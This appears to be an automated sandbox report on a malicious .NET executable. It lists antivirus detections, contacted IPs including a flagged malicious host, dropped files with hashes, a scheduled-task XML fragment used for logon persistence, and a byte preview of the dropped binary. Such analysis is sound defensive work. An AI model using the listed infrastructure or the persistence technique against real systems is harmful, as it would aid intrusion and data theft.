              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe39%ReversingLabsByteCode-MSIL.Infostealer.Pony
              file.exe100%AviraHEUR/AGEN.1305624
              file.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe100%AviraHEUR/AGEN.1305624
              C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe39%ReversingLabsByteCode-MSIL.Infostealer.Pony

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://api.libertyreserve.com/beta/xml/transfer.aspx0%Avira URL Cloudsafe
              https://api.libertyreserve.com/beta/xml/balance.aspx$AccountNameRequestphttps://api.libertyreserve.c0%Avira URL Cloudsafe
              https://api.libertyreserve.com/beta/xml/history.aspx0%Avira URL Cloudsafe
              https://api.libertyreserve.com/beta/xml/balance.aspx%AccountNameRequestqhttps://api.libertyreserve.c0%Avira URL Cloudsafe
              https://sci.libertyreserve.com/0%Avira URL Cloudsafe
              https://api.libertyreserve.com/beta/xml/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              		199.232.214.172
              		truefalse
                		high
                s-part-0035.t-0009.t-msedge.net
                		13.107.246.63
                		truefalse
                  		high
                  fp2e7a.wpc.phicdn.net
                  		192.229.221.95
                  		truefalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gpMSBuild.exefalse
                      		high
                      https://api.libertyreserve.com/beta/xml/balance.aspx%AccountNameRequestqhttps://api.libertyreserve.cfile.exe, DcBNSgyxoJFip.exe.0.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.libertyreserve.com/beta/xml/transfer.aspxDcBNSgyxoJFip.exe.0.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.libertyreserve.com/beta/xml/balance.aspx$AccountNameRequestphttps://api.libertyreserve.cfile.exe, DcBNSgyxoJFip.exe.0.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://geoplugin.net/json.gp/Cfile.exe, 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        		high
                        https://sci.libertyreserve.com/DcBNSgyxoJFip.exe.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.2168087268.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, DcBNSgyxoJFip.exe, 00000009.00000002.2200731306.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://api.libertyreserve.com/beta/xml/history.aspxDcBNSgyxoJFip.exe.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.libertyreserve.com/beta/xml/file.exe, DcBNSgyxoJFip.exe.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          107.173.4.16
                          		unknownUnited States
                          		36352AS-COLOCROSSINGUStrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1576998
                          Start date and time:2024-12-17 20:37:09 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 3s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:15
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.rans.troj.spyw.expl.evad.winEXE@16/11@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 96%
                          • Number of executed functions: 192
                          • Number of non-executed functions: 220
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 20.198.118.190, 23.218.208.109, 20.12.23.50, 192.229.221.95, 52.165.164.15, 199.232.214.172, 13.107.246.63
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          14:38:03API Interceptor1x Sleep call for process: file.exe modified
                          14:38:06API Interceptor11x Sleep call for process: powershell.exe modified
                          14:38:08API Interceptor1x Sleep call for process: DcBNSgyxoJFip.exe modified
                          14:38:42API Interceptor4229199x Sleep call for process: MSBuild.exe modified
                          20:38:08Task SchedulerRun new task: DcBNSgyxoJFip path: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          107.173.4.16newthingswithgreatupdateiongivenbestthingswithme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                            crreatedbestthingswithgreatattitudeneedforthat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                              WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                  na.rtfGet hashmaliciousRemcosBrowse
                                    PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                      PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                        SecuriteInfo.com.FileRepMalware.12793.28433.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            5UQ2Xybm0q.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              s-part-0035.t-0009.t-msedge.netnsdksetup.dllGet hashmaliciousUnknownBrowse
                                              • 13.107.246.63
                                              https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29tGet hashmaliciousUnknownBrowse
                                              • 13.107.246.63
                                              https://t.co/4MnukUbNZXGet hashmaliciousHTMLPhisherBrowse
                                              • 13.107.246.63
                                              cpu_rootkit.exeGet hashmaliciousCobaltStrikeBrowse
                                              • 13.107.246.63
                                              https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comGet hashmaliciousHTMLPhisherBrowse
                                              • 13.107.246.63
                                              http://www.delinian.comGet hashmaliciousUnknownBrowse
                                              • 13.107.246.63
                                              122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                              • 13.107.246.63
                                              pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                              • 13.107.246.63
                                              JkICQ13OOY.dllGet hashmaliciousUnknownBrowse
                                              • 13.107.246.63
                                              r63NANrAHS.jsGet hashmaliciousUnknownBrowse
                                              • 13.107.246.63
                                              fp2e7a.wpc.phicdn.net66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                              • 192.229.221.95
                                              https://flusoprano.com/f/4/0/f24b0aaf975ee65a83aae9b19316ec90.jsGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              nSs9QIsTua.jsGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              http://uhsee.comGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              veOECiSunn.exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              z2kJvTjVVa.exeGet hashmaliciousCryptbotBrowse
                                              • 192.229.221.95
                                              DQmU06kq9I.exeGet hashmaliciousLiteHTTP BotBrowse
                                              • 192.229.221.95
                                              3fX4NR35LH.exeGet hashmaliciousCryptbotBrowse
                                              • 192.229.221.95
                                              a8o2z9Awf6.exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              BKT2HSG6sZ.exeGet hashmaliciousRedLineBrowse
                                              • 192.229.221.95
                                              bg.microsoft.map.fastly.nethttps://garfieldthecat.tech/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                              • 199.232.210.172
                                              lavita.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                              • 199.232.210.172
                                              mjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                              • 199.232.214.172
                                              BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                              • 199.232.210.172
                                              ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                              • 199.232.214.172

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              AS-COLOCROSSINGUSSwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                              • 192.210.150.17
                                              Document.xlaGet hashmaliciousUnknownBrowse
                                              • 172.245.123.12
                                              greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                              • 23.95.235.29
                                              sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                              • 23.95.235.29
                                              createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                              • 172.245.123.12
                                              ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                              • 192.3.220.6
                                              newthingswithgreatupdateiongivenbestthingswithme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                              • 107.173.4.16
                                              crreatedbestthingswithgreatattitudeneedforthat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                              • 107.173.4.16
                                              Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                              • 192.3.179.166
                                              Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                              • 192.3.179.166

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DcBNSgyxoJFip.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.380805901110357
                                              Encrypted:false
                                              SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                              MD5:F9B7CF60C22DBE6B73266580FFD54629
                                              SHA1:05ED734C0A5EF2ECD025D4E39321ECDC96612623
                                              SHA-256:880A3240A482AB826198F84F548F4CB5B906E4A2D7399D19E3EF60916B8D2D89
                                              SHA-512:F55EFB17C1A45D594D165B9DC4FA2D1364B38AA2B0D1B3BAAE6E1E14B8F3BD77E3A28B7D89FA7F6BF3EEF3652434228B1A42BF9851F2CFBB6A7DCC0254AAAE38
                                              Malicious:false
                                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0e0tvyo.aya.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_we4v0puc.v4z.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wsiacupe.jna.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yk45oww2.is0.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1600
                                              Entropy (8bit):5.10146807503795
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLExvn:cge7QYrFdOFzOzN33ODOiDdKrsuT4v
                                              MD5:16D1174B9575EAE37EF06411BB807230
                                              SHA1:07BA0F7608FA03AD708FBFBDD5362EBB30FFD95F
                                              SHA-256:408A926EBD9A179543B516C2DE3237F0D01DC963E1528CF6DA1CAE1F2476C703
                                              SHA-512:D2BD2C1B83FEF36F2B9CA736B17F707F9C5F81307DB5D69773B3CF8FB2F71A8F4A97B653A8248C8C90F9EC681BA6BE0971F20C60B2D125DB7F76F603D21D7485
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                              C:\Users\user\AppData\Local\Temp\tmp2A05.tmp

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1600
                                              Entropy (8bit):5.10146807503795
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLExvn:cge7QYrFdOFzOzN33ODOiDdKrsuT4v
                                              MD5:16D1174B9575EAE37EF06411BB807230
                                              SHA1:07BA0F7608FA03AD708FBFBDD5362EBB30FFD95F
                                              SHA-256:408A926EBD9A179543B516C2DE3237F0D01DC963E1528CF6DA1CAE1F2476C703
                                              SHA-512:D2BD2C1B83FEF36F2B9CA736B17F707F9C5F81307DB5D69773B3CF8FB2F71A8F4A97B653A8248C8C90F9EC681BA6BE0971F20C60B2D125DB7F76F603D21D7485
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                              C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):1075712
                                              Entropy (8bit):7.758865424514257
                                              Encrypted:false
                                              SSDEEP:24576:60u2uOCjadxmISCQDJ8wovaxTFfJDe4Pu2:6euCfLQ5xTFd5
                                              MD5:065A6053492ECC989755413D4B9CFFEA
                                              SHA1:9955CDE6556837BC877E596C5B206DF39D060A00
                                              SHA-256:BE5FBED126BE0685414464F8D18C42027CBB09C884640C35E2420F96C0D254DF
                                              SHA-512:1185623940E192747B0C794C3E63C56AD6F941DCA6CCCF5DB2CBF57CCF3CCA6B3BA49AA9922DFDE87C82B69920C48222C249B70E13915E542DFB6E11072C9588
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 39%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ag..............0..6...2.......U... ...`....@.. ....................................@..................................U..O....`..L/........................................................................... ............... ..H............text....5... ...6.................. ..`.rsrc...L/...`...0...8..............@..@.reloc...............h..............@..B.................U......H.......XX..(................w............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*r.(......(......(......(....*.0..Y........(.....(.....{...........%.r...p(....s.....%.r...p(....s.....%.r!..p(....s........(....&*....0..j..........{....o....(....%.}.....}.....{....rg..p.|....(....rq..p(....o.....{....rg..p.|....(....rq..p(....o....*...0..]........{....o....(.....#......@.Y.#3333...@.#.......@ZX#.p=...?Y.(......{......(....o...

                                              C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.758865424514257
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:file.exe
                                              File size:1'075'712 bytes
                                              MD5:065a6053492ecc989755413d4b9cffea
                                              SHA1:9955cde6556837bc877e596c5b206df39d060a00
                                              SHA256:be5fbed126be0685414464f8d18c42027cbb09c884640c35e2420f96c0d254df
